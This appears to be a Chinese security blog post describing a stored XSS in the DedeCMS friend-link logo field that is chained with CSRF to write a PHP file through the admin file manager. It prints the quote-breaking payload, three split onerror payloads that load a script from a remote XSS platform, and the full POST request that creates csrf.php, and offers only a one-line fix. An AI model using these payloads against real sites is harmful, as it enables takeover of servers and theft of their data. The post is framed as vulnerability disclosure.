最近csrf又火了哈,各种csrf脱裤。dede后台挺方便就直接写getshell了 在黑盒测试友情链接功能的时候发现filter的一个bug 网站logo处提交">_<'"<>发现后台显示logo时居然成功引入了双引号闭合了src属性。 经过多次测试发现 只要单引号后面跟"就能成功闭合双引号 于是提交测试代码 '" onerror=alert(1);//
成功弹出了alert 先用xss平台创建一个项目,然后自定义代码这里用的pkav的post get模块 post http://192.168.1.114/dede/file_manage_control.php data fmdo=edit&backurl=&activepath=&filename=csrf.php&str=%3C%3Fphp+phpinfo%28%29%3B%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++ 因为此处字符长度有限制所以将payload拆分为3段 分别提交 '" onerror=s.src='https://xss平台/KCfTiA';//
'" onerror=body.appendChild(s);//
'" onerror=s=createElement('script');// 注意显示的顺序与提交的顺序是相反的 所以要把payload顺序倒过来 提交完后访问后台友情链接模块 可以看到访问了js 然后访问了file_manage_control.php 文件管理可以看到shell已经躺在目录里了
修复方案:xss 过滤器 |
-
上一篇: ecshop设计缺陷导致存在脱裤风险 - 网站安全 - 自
下一篇: ecshop最新版本存储XSS至后台 - 网站安全 - 自学p
还没有人抢沙发呢~